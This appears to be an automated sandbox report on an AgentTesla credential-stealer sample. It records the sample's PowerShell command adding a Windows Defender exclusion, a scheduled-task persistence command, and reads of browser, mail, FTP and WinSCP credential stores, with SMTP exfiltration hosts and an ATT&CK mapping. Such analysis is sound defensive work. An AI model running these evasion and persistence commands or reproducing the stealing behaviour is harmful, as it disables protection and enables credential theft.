                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 03SPwb995m.exe, 00000008.00000002.923174649.00000000063E0000.00000004.00000010.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmpJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Users\user\Desktop\03SPwb995m.exe C:\Users\user\Desktop\03SPwb995m.exeJump to behavior
                      Source: 03SPwb995m.exe, 00000008.00000002.918848488.0000000001500000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: 03SPwb995m.exe, 00000008.00000002.918848488.0000000001500000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: 03SPwb995m.exe, 00000008.00000002.918848488.0000000001500000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: 03SPwb995m.exe, 00000008.00000002.918848488.0000000001500000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Users\user\Desktop\03SPwb995m.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Users\user\Desktop\03SPwb995m.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.03SPwb995m.exe.40065a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.03SPwb995m.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.03SPwb995m.exe.3fd0380.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.03SPwb995m.exe.3fd0380.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.03SPwb995m.exe.40065a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.674290952.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.675912617.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.674955731.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 03SPwb995m.exe PID: 1364, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 03SPwb995m.exe PID: 5596, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 03SPwb995m.exe PID: 5596, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.03SPwb995m.exe.40065a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.03SPwb995m.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.03SPwb995m.exe.3fd0380.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.03SPwb995m.exe.3fd0380.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.03SPwb995m.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.03SPwb995m.exe.40065a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.674290952.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.675912617.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.674955731.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 03SPwb995m.exe PID: 1364, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 03SPwb995m.exe PID: 5596, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection12Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSSecurity Software Discovery311Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 528805 Sample: 03SPwb995m Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 33 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->33 35 Found malware configuration 2->35 37 Multi AV Scanner detection for dropped file 2->37 39 8 other signatures 2->39 7 03SPwb995m.exe 7 2->7         started        process3 file4 23 C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, PE32 7->23 dropped 25 C:\Users\user\AppData\Local\...\tmp7B67.tmp, XML 7->25 dropped 27 C:\Users\user\AppData\...\03SPwb995m.exe.log, ASCII 7->27 dropped 41 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->41 43 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->43 45 Uses schtasks.exe or at.exe to add and modify task schedules 7->45 47 Adds a directory exclusion to Windows Defender 7->47 11 03SPwb995m.exe 6 7->11         started        15 powershell.exe 21 7->15         started        17 schtasks.exe 1 7->17         started        signatures5 process6 dnsIp7 29 208.91.199.224, 49834, 587 PUBLIC-DOMAIN-REGISTRYUS United States 11->29 31 us2.smtp.mailhostbox.com 208.91.199.223, 49833, 587 PUBLIC-DOMAIN-REGISTRYUS United States 11->31 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->49 51 Tries to steal Mail credentials (via file / registry access) 11->51 53 Tries to harvest and steal ftp login credentials 11->53 55 2 other signatures 11->55 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      03SPwb995m.exe22%VirustotalBrowse
                      03SPwb995m.exe29%ReversingLabsByteCode-MSIL.Trojan.Taskun

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe22%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe29%ReversingLabsByteCode-MSIL.Trojan.Taskun

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.0.03SPwb995m.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      8.2.03SPwb995m.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.03SPwb995m.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.03SPwb995m.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.03SPwb995m.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.03SPwb995m.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://1pbBaOuWGX2iibYLF.net0%Avira URL Cloudsafe
                      http://GwvXXB.com0%Avira URL Cloudsafe
